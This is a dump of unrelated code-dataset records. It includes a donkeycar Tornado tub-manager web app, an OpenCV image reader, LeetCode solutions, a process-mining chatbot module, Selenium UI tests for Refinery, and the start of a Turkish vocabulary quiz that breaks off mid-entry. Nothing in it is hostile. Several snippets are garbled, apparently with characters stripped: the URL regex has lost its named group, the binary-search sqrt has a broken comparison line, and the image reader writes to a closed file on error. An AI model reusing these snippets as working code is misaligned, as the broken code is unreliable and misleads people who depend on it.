range(params['pos_corpus_per_query'],params['total_corpus_per_query']):\n labels[i][j] = 0\n\n\n return params,train_queries,train_corpus,test_corpus,val_corpus,labels,labels,labels\n\n\n\ndef main():\n ap = ArgumentParser()\n ap.add_argument(\"--data_path\", type=str, default=\"./data/clevr.pkl\")\n ap.add_argument(\"--logfile\", type=str, default=\"./logs/dataset.log\")\n ap.add_argument(\"--num_queries\", type=int, default=50)\n ap.add_argument(\"--noise\", type=float, default=0.0)\n ap.add_argument(\"--seed\", type=str, default=0)\n av = ap.parse_args()\n seed = av.seed\n random.seed(seed)\n np.random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(av.seed)\n\n params = {\n 'max_corpus_nodes': 10,\n 'max_query_nodes': 5,\n 'num_queries': av.num_queries,\n 'pos_corpus_per_query': 20,\n 'total_corpus_per_query': 100,\n 'noise': av.noise\n }\n data = noisy_data_gen(params)\n outfile = open(av.data_path, 'wb')\n pkl.dump(data, outfile)\n outfile.close()\n\n\nmain()","sub_path":"vaq_dataset_gen.py","file_name":"vaq_dataset_gen.py","file_ext":"py","file_size_in_byte":13706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"396136318","text":"'''\ntub.py\n\nManage tubs\n'''\n\nimport os\nimport json\nimport tornado\n\n\nclass TubManager:\n\n def run(self, args):\n WebServer(args[0]).start()\n\n\nclass WebServer(tornado.web.Application):\n\n def __init__(self, data_path):\n this_dir = os.path.dirname(os.path.realpath(__file__))\n static_file_path = os.path.join(this_dir, 'tub_web', 'static')\n \n handlers = [\n (r\"/\", tornado.web.RedirectHandler, dict(url=\"/tubs\")),\n (r\"/tubs\", TubsView, dict(data_path=data_path)),\n (r\"/tubs/?(?P[^/]+)?\", TubView),\n (r\"/api/tubs/?(?P[^/]+)?\", TubApi, dict(data_path=data_path)),\n (r\"/static/(.*)\", tornado.web.StaticFileHandler, {\"path\": static_file_path}),\n (r\"/tub_data/(.*)\", tornado.web.StaticFileHandler, {\"path\": data_path}),\n ]\n\n settings = {'debug': True}\n\n super().__init__(handlers, **settings)\n\n def start(self, port=8886):\n self.port = int(port)\n self.listen(self.port)\n print('Listening on {}...'.format(port))\n tornado.ioloop.IOLoop.instance().start()\n\n\nclass TubsView(tornado.web.RequestHandler):\n\n def initialize(self, data_path):\n self.data_path = data_path\n\n def get(self):\n import fnmatch\n data = {\"tubs\": fnmatch.filter(os.listdir(self.data_path), '*')}\n self.render(\"tub_web/tubs.html\", **data)\n\n\nclass TubView(tornado.web.RequestHandler):\n\n def get(self, tub_id):\n data = {}\n self.render(\"tub_web/tub.html\", **data)\n\n\nclass TubApi(tornado.web.RequestHandler):\n\n def initialize(self, data_path):\n self.data_path = data_path\n\n def get(self, tub_id):\n tub_path = os.path.join(self.data_path, tub_id)\n tub_json = os.path.join(tub_path, 'tub.json')\n\n if not os.path.isfile(tub_json):\n seqs = [ int(f.split(\"_\")[0]) for f in os.listdir(tub_path) if f.endswith('.jpg') ]\n seqs.sort()\n with open(tub_json, 'w') as outfile:\n json.dump({'clips': [seqs]}, outfile)\n\n with open(tub_json,'r') as f:\n self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n self.write(f.read())\n\n def post(self, tub_id):\n tub_path = os.path.join(self.data_path, tub_id)\n tub_json = os.path.join(tub_path, 'tub.json')\n\n with open(tub_json) as infile:\n old_clips = json.load(infile)\n\n new_clips = tornado.escape.json_decode(self.request.body)\n\n with open(tub_json, 'w') as outfile:\n json.dump(new_clips, outfile)\n\n import itertools\n old_frames = list(itertools.chain(*old_clips['clips']))\n new_frames = list(itertools.chain(*new_clips['clips']))\n frames_to_delete = [str(item) for item in old_frames if item not in new_frames]\n for frm in frames_to_delete:\n os.remove(os.path.join(tub_path, \"record_\" + frm + \".json\"))\n os.remove(os.path.join(tub_path, frm + \"_cam-image_array_.jpg\"))\n","sub_path":"donkeycar/management/tub.py","file_name":"tub.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"75109754","text":"# -*- coding: utf-8 -*-\r\nimport cv2\r\nimport numpy as np\r\nimport struct\r\n\r\n\r\ndef proc():\r\n\t'''\r\n\t打开tmp/_tp_imread_pyR.bin文件,这个文件为图像所在路径(utf8前100字节)+缓存buffer_len(后4字节)\r\n\t产生回应文件tmp/_tp_imread_pyT.bin\r\n\t如果图像打开失败文件第一个4字节为-1\r\n\t如果缓冲区不足文件第一个4字节为需要的缓冲数目lenBuffer(4字节,单位字节),dp(4字节),heigh(4字节),width(4字节)\r\n\t否则返回\r\n\t0,dp,heigh,width, 图像(dp,height,width)(unsigned char)\r\n\t'''\r\n\r\n\t#得到path,buffer_len\r\n\tfile=open('tmp/_tp_imread_pyR.bin','rb')\r\n\tpath=file.read(100).decode('utf-8')\r\n\tlenBuffer=struct.unpack('i',file.read(4))[0]\r\n\tfile.close()\r\n\r\n\t#得到图像信息\r\n\timg=cv2.imread(path)\r\n\t\r\n\t#如果读取失败则回复失败,ret为-1\r\n\tif hasattr(img,'shape')==False:\r\n\t\tbf=struct.pack('i',-1)\r\n\t\tfile.write(bf)\r\n\t\tfile.close()\r\n\t\treturn\r\n\t\r\n\t#打开回应文件\r\n\tfile=open('tmp/_tp_imread_pyT.bin','wb+')\r\n\r\n\t#得到-- 高度,宽度,深度\r\n\theigh=img.shape[0]\r\n\twidth=img.shape[1]\r\n\tdp=img.shape[2] # dp==3\r\n\tlenData=heigh*width*dp # lenData<=lenBuffer\r\n\r\n\t#buffer空间不足,ret=需要空间,h,w\r\n\tif lenData>lenBuffer:\r\n\t\tbf=struct.pack('iiii',lenData,dp,heigh,width)\r\n\t\tfile.write(bf)\r\n\t\tfile.close()\r\n\t\treturn\r\n\r\n\t#可以读取\r\n\tif dp==3:\r\n\t\timg=cv2.cvtColor(img,cv2.COLOR_BGR2RGB) #转化成RGB\r\n\tbf=struct.pack('iiii',0,dp,heigh,width)\r\n\tfile.write(bf)\r\n\r\n\tfor c in range(dp):\r\n\t\tfor i in range(heigh):\r\n\t\t\tfor j in range(width):\r\n\t\t\t\tbf=struct.pack('B',img[i,j,c])\r\n\t\t\t\tfile.write(bf)\r\n\t\r\n\tfile.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n proc()\r\n","sub_path":"examples/cifar10-tinynet/python/imread.py","file_name":"imread.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253383276","text":"#\n# @lc app=leetcode id=69 lang=python3\n#\n# [69] Sqrt(x)\n#\n# https://leetcode.com/problems/sqrtx/description/\n#\n# algorithms\n# Easy (31.04%)\n# Total Accepted: 353.5K\n# Total Submissions: 1.1M\n# Testcase Example: '4'\n#\n# Implement int sqrt(int x).\n# \n# Compute and return the square root of x, where x is guaranteed to be a\n# non-negative integer.\n# \n# Since the return type is an integer, the decimal digits are truncated and\n# only the integer part of the result is returned.\n# \n# Example 1:\n# \n# \n# Input: 4\n# Output: 2\n# \n# \n# Example 2:\n# \n# \n# Input: 8\n# Output: 2\n# Explanation: The square root of 8 is 2.82842..., and since \n# the decimal part is truncated, 2 is returned.\n# \n# \n#\nclass Solution:\n def mySqrt(self, x: int):\n if x in [0, 1]:\n return x\n cur = x\n while True:\n if cur**2==x:\n return cur\n elif (cur//2)**2 < x:\n break\n cur//=2\n l, r = cur//2, cur\n while r > l:\n mid = (r+l)//2\n if mid**2==x or mid**2 x:\n r = mid\n else:\n l = mid \n return l\n def mySqrt1(self, x):\n return int(x**0.5)\nprint(Solution().mySqrt(6))\n","sub_path":"cn/BinarySearch/69.sqrt-x.py","file_name":"69.sqrt-x.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"382340405","text":"import os\nimport Globals\nimport PM.pm as pm\nimport PM.rexecutor as r_executor\nfrom Enums.reply_enum import ReplyType\nfrom Enums.bot_state_enum import BotState\nfrom Enums.execution_enum import ExecutionState\n#from ContextManager.ContextManager import ContextManager as c_manager\nfrom NLP import HelperFunctions as h_functions\n\nfrom decouple import config\n\nR_SCRIPT = config('R_SCRIPT')\nR_SCRIPT_FOLDER = config('R_SCRIPT_FOLDER')\n\n_previous_intent = None\n\ndef find_command_back(msg, e_obj):\n for i in e_obj.objects:\n if i.intent == msg:\n if i.execution == ExecutionState.Nothing:\n return i.function(), i.reply_type\n return i.function, i.reply_type\n return [\"I'm sorry, but I don't understand that command, please type /help to get info on the possible commands.\", ReplyType.text]\n\n\n#import NLP.ExecutionObjects as e_obj\n#Uniform function to handle both commands and intents from dialogflow\n#msg is the input, command is a boolean specifying if input is a command\ndef execute_input(msg, e_objects, chat_id, command):\n global _previous_intent\n context_manager = Globals.get_context_manager()\n function = None\n reply_type = None\n for i in e_objects: # !!!!!!!\n if command:\n if i.command is not None and i.command[1:] == msg:\n function = i.function\n reply_type = i.reply_type\n _previous_intent = i\n break\n else:\n if i.intent == msg:\n function = i.function\n reply_type = i.reply_type\n _previous_intent = i\n break\n if function == None or reply_type == None:\n return [\"I'm sorry, but I don't understand that command, please type /help to get info on the possible commands.\", ReplyType.text]\n if i.change_state:\n if i.new_state == BotState.Waiting_for_conformance_input:\n Globals.set_bot_state(BotState.Waiting_for_conformance_input)\n return \"\"\"How would you like the conformance check to be done? by running alpha miner on the current log and using this for model, by running inductive miner on the current log and using this for model or just by using the current model?\\n\nPlease write 'alpha', 'inductive' or 'current' to choose an option.\"\"\", reply_type.text\n if i.script_from_db:\n #Import script to run\n _, _, script, _ = context_manager.get_script(i.script_name)\n Globals.bot_state_init_mining()\n result = i.function(script, context_manager.get_current_log(chat_id))\n Globals.bot_state_finish()\n return result, i.reply_type\n if i.execution == ExecutionState.Nothing:\n #function doesn't take any arguments\n return function(), reply_type\n elif i.execution == ExecutionState.Log:\n #Function takes log as argument\n Globals.bot_state_init_mining()\n result = function(context_manager.get_current_file(chat_id, 'xes'))\n Globals.bot_state_finish()\n return result, reply_type\n elif i.execution == ExecutionState.Model:\n #Function takes model as argument\n Globals.bot_state_init_mining()\n result = function(context_manager.get_current_model(chat_id))\n Globals.bot_state_finish()\n return result, reply_type\n elif i.execution == ExecutionState.Both:\n #Funtion takes both log and model as argument\n Globals.bot_state_init_mining()\n result = function(context_manager.get_current_log(chat_id), context_manager.get_current_model(chat_id)), reply_type\n Globals.bot_state_finish()\n return result, reply_type\n elif i.execution == ExecutionState.Chat_id:\n result = function(chat_id)\n return result, reply_type\n else: \n return function, reply_type\n \n\ndef handle_conformance(msg, chat_id):\n c_manager = Globals.get_context_manager()\n conformance_type = \"\"\n conformance_model = \"\"\n if 'precision' in _previous_intent.intent:\n conformance_type = 'precision'\n elif 'fitness' in _previous_intent.intent:\n conformance_type = 'fitness'\n elif 'complete' in _previous_intent.intent:\n conformance_type = 'complete'\n else:\n return \"Somethings wrong\", ReplyType.text\n if msg.lower() == 'alpha':\n conformance_model = 'alpha'\n elif msg.lower() == 'inductive':\n conformance_model = 'inductive'\n elif msg.lower() == 'current':\n conformance_model = 'current'\n else:\n return \"somethings wrong with your input\", ReplyType.text\n\n Globals.bot_state_init_mining()\n print(_previous_intent.function)\n result = _previous_intent.function(c_manager.get_current_log(chat_id), c_manager.get_current_model(chat_id), conformance_type, conformance_model)\n info = result['result']\n result_string = \"\"\n if(isinstance(info, dict)):\n for key, value in info.items(): \n result_string += key + \": \" + str(value) + \"\\n\"\n else:\n result_string = conformance_type + \"_\" + conformance_model + \" = \" + str(info)\n reply = [[[result_string[:-1], ReplyType.text], [result['Model'], ReplyType.photo]], ReplyType.multi]\n print(\"result: \", result)\n Globals.bot_state_finish()\n return reply\n \ndef handle_file_replacement(current_file, intent):\n c_manager = Globals.get_context_manager()\n file_type = 'log' if current_file['type'] == 'xes' else 'model'\n existing, last_id = c_manager.save_file(current_file)\n if intent == 'Yes':\n c_manager.set_current_file(last_id, current_file)\n reply = f\"Ok I've uploaded the {file_type} and replaced it as the chats current {file_type}\"\n elif intent == 'No':\n reply = f\"Ok I haven't replaced the current {file_type}. I've just saved the {file_type} you sent me to this chats files.\"\n if existing: \n return [[reply, ReplyType.text], [\"FUY. The file you've uploaded, seems to already exist on the server so I've created a reference to that file in stead.\", ReplyType.text]], ReplyType.multi\n return reply, ReplyType.text\n","sub_path":"NLP/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":6047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"393644205","text":"## Problem Description.\n# ref: https://leetcode.com/problems/reorder-list/\n# Difficulty: Medium\n#\n# Given a singly linked list L: L0→L1→…→Ln-1→Ln,\n# reorder it to: L0→Ln→L1→Ln-1→L2→Ln-2→…\n# You must do this in-place without altering the nodes' values.\n# For example,\n# Given {1,2,3,4}, reorder it to {1,4,2,3}.\n\n# Solution\n# ref: http://www.programcreek.com/2013/12/in-place-reorder-a-singly-linked-list-in-java/\n# ref: http://www.acmerblog.com/reorder-list-leetcode-6088.html\n# ref: http://www.cnblogs.com/zuoyuan/p/3700846.html\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param {ListNode} head\n # @return {void} Do not return anything, modify head in-place instead.\n def reorderList(self, head):\n\n if head is None or head.next is None:\n return\n\n s=f=fh=head\n # f moves two times faster than s\n while f.next is not None and f.next.next is not None:\n s=s.next\n f=f.next.next\n\n # reverse the second half\n c=s.next\n p=None\n # when c is None, p points the first node of the reversed nodes.\n while c is not None:\n n=c.next\n c.next=p\n p=c\n c=n\n\n # merge first half and last half\n s.next=None\n lh=p\n while fh is not None and lh is not None:\n n=fh.next\n fh.next=lh\n lh=lh.next\n fh.next.next=fh=n\n\n\n\n\n\n\n\n\n","sub_path":"tobebest/leetcode/python/linked_lists/reorder_list.py","file_name":"reorder_list.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"150714443","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/python\n\nimport pygame\nimport time\n\nimport Properties\nimport json\n\nINIT_OP, OP, INIT_FEED, FEED, INIT_SUBJ, SUBJ, END = [ p for p in range(7) ]\n\nclass ExpRunner():\n\n def __init__(self, exp_struct, trial, boxes):\n self.exp_struct = exp_struct\n self.trial = trial\n self.boxes = boxes\n self.set()\n self.instruction = None\n\n def set(self):\n self.current_trial = 0\n self.num_consecutive_lost = 0\n self.waiting = True\n\n def next_trial(self, correct, feedback=False):\n if not feedback:\n if correct:\n self.num_consecutive_lost = 0\n else:\n self.num_consecutive_lost += 1\n\n # print \"NEXT - Num consecutive_lost\", self.num_consecutive_lost\n\n if self.waiting == True:\n if self.num_consecutive_lost < self.exp_struct[\"cut_off\"]:\n self.next()\n else:\n self.end_test()\n\n\n def to_waiting(self):\n self.waiting = True\n\n def next(self):\n self.current_trial = self.current_trial + 1\n\n if self.exp_struct[\"trials\"].has_key(str(self.current_trial)):\n t = str(self.current_trial)\n # print \"STARTING WITH trial \" + t\n\n sequence = self.exp_struct[\"trials\"][str(self.current_trial)][0]\n feedback = json.loads(self.exp_struct[\"trials\"][str(self.current_trial)][1])\n self.instruction.set_num(len(sequence), (lambda: self.trial.start(t, sequence, feedback)))\n else:\n self.end_test()\n","sub_path":"corsi/src/inc/ExpRunner.py","file_name":"ExpRunner.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"297214718","text":"from django.contrib.auth.models import User\n\nfrom core.management.commands.create_public_group import create_public_group\nfrom core.management.commands.create_user import init_user\nfrom core.models import Analysis, DataSet\nfrom factory_boy.utils import make_analyses_with_single_dataset, make_datasets\n\nfrom .utils import (MAX_WAIT, SeleniumTestBaseGeneric, assert_body_text,\n assert_text_within_id, delete_from_ui, login,\n wait_until_class_visible, wait_until_id_clickable,\n wait_until_id_visible)\n\n\nclass RefinerySeleniumTestBase(SeleniumTestBaseGeneric):\n \"\"\"\n Base class for selenium tests specifically testing Refinery UI components\n \"\"\"\n def setUp(self, site_login=True, initialize_guest=True,\n public_group_needed=True):\n\n super(RefinerySeleniumTestBase, self).setUp()\n\n if initialize_guest:\n init_user(\"guest\", \"guest\", \"guest@coffee.com\", \"Guest\", \"Guest\",\n \"Test User\", is_active=True)\n self.user = User.objects.get(username=\"guest\")\n\n if site_login:\n login(self.browser, self.live_server_url)\n\n if public_group_needed:\n create_public_group()\n\n\nclass NoLoginTestCase(RefinerySeleniumTestBase):\n \"\"\"\n Ensure that Refinery looks like it should when there is no currently\n logged in user\n \"\"\"\n\n # RefinerySeleniumTestBase.setUp(): We don't need to login or\n # initialize the guest user this time\n def setUp(self, site_login=True, initialize_guest=True,\n public_group_needed=False):\n super(NoLoginTestCase, self).setUp(initialize_guest=False,\n site_login=False)\n\n def test_login_not_required(self):\n self.browser.get(self.live_server_url)\n assert_body_text(\n self.browser,\n search_array=['Collaboration', 'Statistics', 'About',\n 'Register', 'Login', 'Launch Pad', 'Data Sets',\n 'Analyses', 'Workflows']\n )\n\n self.browser.find_element_by_link_text('Statistics').click()\n assert_body_text(\n self.browser,\n search_array=[\n 'Users',\n 'Groups',\n 'Files',\n 'Data Sets',\n 'Workflows',\n 'Projects'\n ]\n )\n\n self.browser.find_element_by_link_text('About').click()\n assert_body_text(self.browser,\n search_array=['Background', 'Contact', 'Funding',\n 'Team',\n 'Most Recent Code for this Instance'])\n # TODO: All sections are empty right now\n\n\nclass DataSetsPanelTestCase(RefinerySeleniumTestBase):\n \"\"\"\n Ensure that the DataSet upload button and DataSet Preview look like\n they're behaving normally\n \"\"\"\n\n def test_data_set_preview(self):\n \"\"\"Test DataSet Preview\"\"\"\n\n # Create sample Data & refresh page\n make_analyses_with_single_dataset(5, self.user)\n\n wait_until_class_visible(self.browser, \"title\", MAX_WAIT)\n self.browser.find_elements_by_class_name(\"title\")[0].click()\n\n search_array = [\"SUMMARY\", \"Description\",\n \"Number of files (total file size)\", \"Owner\",\n \"ANALYSES\", \"REFERENCES\", \"PROTOCOLS\",\n ]\n for item in Analysis.objects.filter(name__startswith=\"Test Analysis\"):\n search_array.append(item.name)\n\n assert_body_text(self.browser, search_array)\n\n def test_upload_button(self):\n \"\"\"Test Upload button\"\"\"\n\n wait_until_id_clickable(self.browser, \"import-button\",\n MAX_WAIT).click()\n assert_body_text(\n self.browser,\n search_array=[\n \"Data Set Import\",\n \"Tabular Metadata\",\n \"ISA-Tab Metadata\",\n \"PROVIDE METADATA FILE\",\n \"Download an example tabular metadata file.\",\n \"Must contain column headers in the first row of the table\"]\n )\n\n\nclass UiDeletionTestCase(RefinerySeleniumTestBase):\n \"\"\"Ensure proper deletion of DataSets and Analyses from the UI\"\"\"\n\n def test_dataset_deletion(self, total_datasets=2):\n \"\"\"Delete some datasets and make sure the UI updates properly\"\"\"\n\n # Create sample Data & refresh page\n make_datasets(total_datasets, self.user)\n wait_until_id_visible(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(total_datasets)\n )\n\n delete_from_ui(self.browser, \"dataset\", total_datasets)\n\n def test_analysis_deletion(self, total_analyses=2):\n \"\"\"Delete some analyses and make sure the UI updates properly\"\"\"\n\n # Create sample Data\n make_analyses_with_single_dataset(total_analyses, self.user)\n\n wait_until_id_visible(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(self.browser, \"total-datasets\", MAX_WAIT,\n \"{} data sets\".format(1))\n assert_text_within_id(self.browser, \"total-analyses\",\n \"{} analyses\".format(total_analyses))\n\n delete_from_ui(self.browser, \"analysis\", total_analyses)\n\n def test_cascading_deletion_of_analyses(self, total_analyses=5):\n \"\"\"Delete a Dataset and make sure its Analyses are removed from\n the UI as well\"\"\"\n\n # Create sample Data\n make_analyses_with_single_dataset(total_analyses, self.user)\n\n wait_until_id_clickable(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(1))\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analyses\".format(\n total_analyses))\n\n self.browser.find_elements_by_class_name('dataset-delete')[0].click()\n\n wait_until_id_clickable(\n self.browser, 'dataset-delete-button', MAX_WAIT).click()\n\n # Make sure that there are no more Analyses left after the One\n # Dataset is deleted\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analysis\".format(0))\n wait_until_id_clickable(\n self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(0))\n\n def test_that_dataset_404s_are_handled(self, total_analyses=5):\n \"\"\"Test use case where DataSet objects are deleted (for example by an\n admin, or a user inbetween multiple windows) while a user is about to\n delete said object(s) themselves, User should receive a \"Not Found\"\n message\"\"\"\n\n # Create sample Data\n make_analyses_with_single_dataset(total_analyses, self.user)\n\n wait_until_id_clickable(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(1))\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analyses\".format(\n total_analyses))\n\n # Simulate scenario where objects have been deleted on the backend\n DataSet.objects.all().delete()\n\n self.browser.find_elements_by_class_name('dataset-delete')[0].click()\n\n wait_until_id_clickable(\n self.browser, 'dataset-delete-button', MAX_WAIT).click()\n\n wait_until_id_clickable(\n self.browser, \"deletion-message-text\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"deletion-message-text\", MAX_WAIT, \"not found.\")\n wait_until_id_clickable(\n self.browser, 'dataset-delete-close-button', 5).click()\n\n # Ensure that ui displays proper info\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analysis\".format(0))\n wait_until_id_clickable(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(0))\n\n def test_that_analysis_404s_are_handled(self, total_analyses=5):\n \"\"\"Test use case where Analysis objects are deleted (for example by an\n admin, or a user inbetween multiple windows) while a user is about to\n delete said object(s) themselves, User should receive a \"Not Found\"\n message\"\"\"\n\n # Create sample Data\n make_analyses_with_single_dataset(total_analyses, self.user)\n\n wait_until_id_clickable(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(1))\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analyses\".format(\n total_analyses))\n\n # Simulate scenario where objects have been deleted on the backend\n Analysis.objects.all().delete()\n\n self.browser.find_elements_by_class_name('analysis-delete')[0].click()\n\n wait_until_id_clickable(\n self.browser, 'analysis-delete-button', MAX_WAIT).click()\n\n wait_until_id_clickable(\n self.browser, \"deletion-message-text\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"deletion-message-text\", MAX_WAIT, \"not found.\")\n wait_until_id_clickable(\n self.browser, 'analysis-delete-close-button', 5).click()\n\n # Ensure that ui displays proper info\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analysis\".format(0))\n wait_until_id_clickable(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(1))\n","sub_path":"refinery/selenium_testing/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":10755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496059142","text":"from tkinter import *\r\nimport pygame\r\nimport time\r\nimport random\r\n\r\npygame.mixer.init()\r\n\r\npencere=Tk()\r\npencere.tk_setPalette(\"light blue\")\r\npencere.attributes(\"-fullscreen\", 1)\r\n\r\nsözlük={\"abaküs\":\"Sayı boncuğu.\",\r\n \"abartmak\":\"Bir şeyi olduğundan büyük veya çok göstererek anlatmak, mübalâğa etmek.\",\r\n \"abide\":\"Anıt.\",\r\n \"abla\":\"Bir kimsenin kendinden büyük olan kız kardeşi.\",\r\n \"abone\":\"Önceden ödemede bulunarak süreli yayınlara alıcı olma işi.\",\r\n \"abur cubur\":\"Sırası, tadı, yararı gözetilmeksizin rastgele yenilen şeyler.\",\r\n \"acaba\":\"Merak, kararsızlık veya kuşku anlatır.\",\r\n \"acele\":\"Çabuk davranma zorunluluğu, ivedi.\",\r\n \"acemi\":\"Bir işin yabancısı olan, eli işe alışmamış.\",\r\n \"acı\":\"Tat alma organında bazı maddelerin bıraktığı yakıcı durum, tatlı karşıtı.\",\r\n \"acıkmak\":\"Açlık duymak, yemek yeme ihtiyacı duymak.\",\r\n \"acılı\":\"Acı katılmış olan.\",\r\n \"acil\":\"İvedi, ivedili.\",\r\n \"âciz\":\"Gücü bir işe yetmez olan, güçsüz.\",\r\n \"aç\":\"Yemek yeme ihtiyacı olan veya yemesi gereken, tok karşıtı.\",\r\n \"açık\":\"Açılmış, kapalı olmayan, kapalı karşıtı.\",\r\n \"açıklamak\":\"Bir konuyla ilgili olarak gerekli bilgileri vermek, izah etmek.\",\r\n \"ad\":\"İsim.\",\r\n \"ada\":\"Her yanı su ile çevrilmiş kara parçası.\",\r\n \"adale\":\"Kas.\",\r\n \"adam\":\"İnsan.\",\r\n \"adet\":\"Sayı.\",\r\n \"adil\":\"Adaletli.\",\r\n \"afacan\":\"Zeki ve yaramaz (çocuk).\",\r\n \"affetmek\":\"Bağışlamak.\",\r\n \"ağ\":\"İplik, sicim, tel gibi ince şeylerden kafes biçiminde yapılmış örgü.\",\r\n \"ağabey\":\"Bir kimsenin kendinden yaşça büyük olan erkek kardeşi.\",\r\n \"ağaç\":\"Gövdesi odun veya kereste olmaya elverişli bulunan ve uzun yıllar yaşayabilen bitki.\",\r\n \"ağıl\":\"Koyun ve keçi sürülerinin gecelediği, çit veya duvarla çevrili yer.\",\r\n \"ağır\":\"Tartıda çok çeken, hafif karşıtı.\",\r\n \"ağlamak\":\"Üzüntü, acı, sevinç, pişmanlık aldanma vb.nin etkisiyle göz yaşı dökmek.\",\r\n \"ağrı\":\"Vücudun herhangi bir yerinde duyulan sürekli ve şiddetli acı.\",\r\n \"ahenk\":\"Uyum.\",\r\n \"ahır\":\"Evcil büyük baş hayvanların barındığı kapalı yer, hayvan damı.\",\r\n \"aidat\":\"Ödenti.\",\r\n \"ak\":\"Beyaz, kara ve siyah karşıtı.\",\r\n \"akçe\":\"Küçük gümüş para.\",\r\n \"akıbet\":\"Son, sonuç.\",\r\n \"akıl\":\"Düşünme, anlama ve kavrama gücü, us.\",\r\n \"akraba\":\"Kan veya evlilik yoluyla birbirine bağlı olan kimseler, hısım.\",\r\n \"akran\":\"Yaşça denk, yaşıt.\",\r\n \"akrobat\":\"Cambaz.\",\r\n \"aksi\":\"Ters, zıt, karşıt, olumsuz.\",\r\n \"akşam\":\"Gündüzün son ve gecenin ilk saatleri.\",\r\n \"aktör\":\"Erkek oyuncu.\",\r\n \"aktris\":\"Kadın oyuncu.\",\r\n \"al\":\"Kızıl alev rengi.\",\r\n \"alâmet\":\"Belirti, işaret, iz, nişan.\",\r\n \"alan\":\"Düz, açık ve geniş yer, meydan, saha.\",\r\n \"alçak\":\"Yerden uzaklığı az olan, yüksek karşıtı.\",\r\n \"aldatmak\":\"Birine verilen sözü tutmamak, yalan söylemek.\",\r\n \"âlim\":\"Bilgin.\",\r\n \"almak\":\"Bir şeyi elle veya başka bir araçla tutarak bulunduğu yerden ayırmak, kaldırmak.\",\r\n \"alo\":\"Telefonda seslenme sözü.\",\r\n \"alp\":\"Yiğit, kahraman.\",\r\n \"alt\":\"Bir şeyin yere bakan yanı, üst karşıtı.\",\r\n \"amaç\":\"Erişilmek istenilen sonuç.\",\r\n \"ambar\":\"Yiyecek ve bazı eşyanın saklandığı yer.\",\r\n \"amca\":\"Babanın erkek kardeşi.\",\r\n \"ana\":\"Çocuğu olan kadın, anne.\",\r\n \"anı\":\"Hatıra.\",\r\n \"anıt\":\"Abide.\",\r\n \"aramak\":\"Bir şeyi bulmak için uğraşmak.\",\r\n \"arzu\":\"İstek, dilek.\",\r\n \"asır\":\"Yüzyıl.\",\r\n \"aş\":\"Pişirilmiş yemek.\",\r\n \"atik\":\"Çabuk hareket eden.\",\r\n \"atlamak\":\"Sıçramak.\",\r\n \"avize\":\"Tavana asılan süslü aydınlatma aracı.\",\r\n \"ay\":\"Dünya'mızın uydusu olan gök cismi.\",\r\n \"ayaz\":\"Kuru soğuk.\",\r\n \"aygıt\":\"Alet, cihaz.\",\r\n \"ayrıntı\":\"Detay.\",\r\n \"az\":\"Çok olmayan.\",\r\n \"aza\":\"Üye.\",\r\n \"azami\":\"En çok, en yüksek.\",\r\n \"baba\":\"Çocuğu olan erkek.\",\r\n \"bağ\":\"Üzüm yetiştirilen bahçe.\",\r\n \"bahtiyar\":\"Mutlu.\",\r\n \"bavul\":\"Yolculukta kullanılan, içine eşya konulan 